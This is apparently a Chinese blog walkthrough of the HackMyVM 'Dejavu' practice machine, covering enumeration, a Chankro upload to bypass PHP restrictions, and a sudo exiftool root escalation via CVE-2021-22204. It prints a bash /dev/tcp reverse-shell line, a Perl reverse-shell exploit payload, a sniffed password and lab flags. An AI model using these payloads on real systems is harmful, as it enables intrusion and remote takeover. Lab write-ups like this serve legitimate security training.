当前位置: 首页 > article >正文

HackMyVM-Dejavu

article 2025/9/4 21:40:05

信息搜集

主机发现

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:39:60:4c, IPv4: 192.168.43.126
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.43.1    c6:45:66:05:91:88       (Unknown: locally administered)
192.168.43.197  04:6c:59:bd:33:50       Intel Corporate
192.168.43.209  08:00:27:32:ef:93       PCS Systemtechnik GmbH
192.168.43.156  b2:a8:93:0d:fb:bd       (Unknown: locally administered)4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.009 seconds (127.43 hosts/sec). 4 responded

端口扫描

┌──(kali㉿kali)-[~]
└─$ nmap --min-rate 10000 -p- 192.168.43.209
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-28 23:40 EDT
Nmap scan report for dejavu (192.168.43.209)
Host is up (0.000084s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:32:EF:93 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 1.92 seconds┌──(kali㉿kali)-[~]
└─$ nmap -sT -sV -O -p22,80 192.168.43.209
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-28 23:41 EDT
Nmap scan report for dejavu (192.168.43.209)
Host is up (0.00027s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 08:00:27:32:EF:93 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.67 seconds

漏洞利用

目录扫描

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.43.209 -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,txt,php,jpg,png,git,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.43.209
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              png,git,zip,html,txt,php,jpg
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10918]
/.html                (Status: 403) [Size: 279]
/info.php             (Status: 200) [Size: 69969]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 279]
Progress: 8982631 / 9482040 (94.73%)[ERROR] Get "http://192.168.43.209/comment-script": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================

/info.php找到了一段注释

在这里插入图片描述

/S3cR3t

在这里插入图片描述

查看一下upload.php

在这里插入图片描述

有防护,使用Chankro,上传一个反弹shell

在这里插入图片描述

┌──(kali㉿kali)-[~]
└─$ cat 1.sh 
bash -c 'bash -i >& /dev/tcp/192.168.43.126/4444 0>&1'
┌──(kali㉿kali)-[~]
└─$ python2 Chankro/chankro.py --arch 64 --input 1.sh --output 4444.phtml --path /var/www/html/.HowToEliminateTheTenMostCriticalInternetSecurityThreats -=[ Chankro ]=--={ @TheXC3LL }=-[+] Binary file: 1.sh
[+] Architecture: x64
[+] Final PHP: 4444.phtml[+] File created!

获取到了shell

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.43.126] from (UNKNOWN) [192.168.43.209] 53064
bash: cannot set terminal process group (771): Inappropriate ioctl for device
bash: no job control in this shell
<nMostCriticalInternetSecurityThreats/S3cR3t/files$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<nMostCriticalInternetSecurityThreats/S3cR3t/files$

权限提升

上传一下脚本,看一看有没有可以利用的

在这里插入图片描述

尝试抓一下包,发现了密码:9737bo0hFx4

在这里插入图片描述

切换到robert用户

<nMostCriticalInternetSecurityThreats/S3cR3t/files$ su robert
su robert
Password: 9737bo0hFx4
id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(pcap)

user.txt

robert@dejavu:~$ cat user.txt
cat user.txt
HMV{c8b75037150fbdc49f6c941b72db0d7c}

发现可利用的地方

robert@dejavu:~$ sudo -l
sudo -l
Matching Defaults entries for robert on dejavu:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser robert may run the following commands on dejavu:(root) NOPASSWD: /usr/local/bin/exiftool
robert@dejavu:~$ head -15 /usr/local/bin/exiftool
head -15 /usr/local/bin/exiftool
#!/usr/bin/perl -w
#------------------------------------------------------------------------------
# File:         exiftool
#
# Description:  Read/write meta information
#
# Revisions:    Nov. 12/03 - P. Harvey Created
#               (See html/history.html for revision history)
#------------------------------------------------------------------------------
use strict;
require 5.004;my $version = '12.23';# add our 'lib' directory to the include list BEFORE 'use Image::ExifTool'

在这里插入图片描述

提权

robert@dejavu:~$ python3 50911.py -s 192.168.43.126 1234
python3 50911.py -s 192.168.43.126 1234_ __,~~~/_        __  ___  _______________  ___  ___,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \|/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....RUNNING: UNICORD Exploit for CVE-2021-22204
PAYLOAD: (metadata "\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(1234,inet_aton('192.168.43.126')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};")        
RUNTIME: DONE - Exploit image written to 'image.jpg'robert@dejavu:~$ sudo /usr/local/bin/exiftool image.jpg
sudo /usr/local/bin/exiftool image.jpg┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 1234          
listening on [any] 1234 ...
connect to [192.168.43.126] from (UNKNOWN) [192.168.43.209] 33370
# id
uid=0(root) gid=0(root) groups=0(root)

root.txt

# cat r0ot.tXt
HMV{c62d75d636f66450980dca2c4a3457d8}
http://www.lryc.cn/news/2392769.html

相关文章:

  • LeetCode Hot100(动态规划)
  • Opencv实用操作5 图像腐蚀膨胀
  • 【赵渝强老师】OceanBase的部署架构
  • (18)混合云架构部署
  • c/c++的opencv霍夫变换
  • AAOS系列之(七) --- AudioRecord录音逻辑分析(一)
  • MySQL大表结构变更利器:pt-online-schema-change原理与实战指南
  • LangChain【3】之进阶内容
  • 大规模JSON反序列化性能优化实战:Jackson vs FastJSON深度对比与定制化改造
  • 【OpenSearch】高性能 OpenSearch 数据导入
  • HTML5有那些更新
  • AWS EC2 实例告警的创建与删除
  • STM32 搭配 嵌入式SD卡在智能皮电手环中的应用全景评测
  • 黑马点评项目01——短信登录以及登录校验的细节
  • 【笔记】Windows 系统安装 Scoop 包管理工具
  • LVS + Keepalived高可用群集
  • MySQL之约束和表的增删查改
  • Greenplum:PB级数据分析的分布式引擎,揭开MPP架构的终极武器
  • Oracle数据库性能优化的最佳实践
  • 云原生时代 Kafka 深度实践:02快速上手与环境搭建
  • Redis7 新增数据结构深度解析:ListPack 的革新与优化
  • 分布式爬虫架构设计
  • 汽配快车道:助力汽车零部件行业的产业重构与数字化出海
  • Windows 11 家庭版 安装Docker教程
  • PyQt6基础_QtCharts绘制横向柱状图
  • 《TCP/IP 详解 卷1:协议》第2章:Internet 地址结构
  • Python学习(5) ----- Python的JSON处理
  • 如何通过一次需求评审,让项目效率提升50%?
  • 再见Notepad++,你好Notepad--
  • element-plus bug整理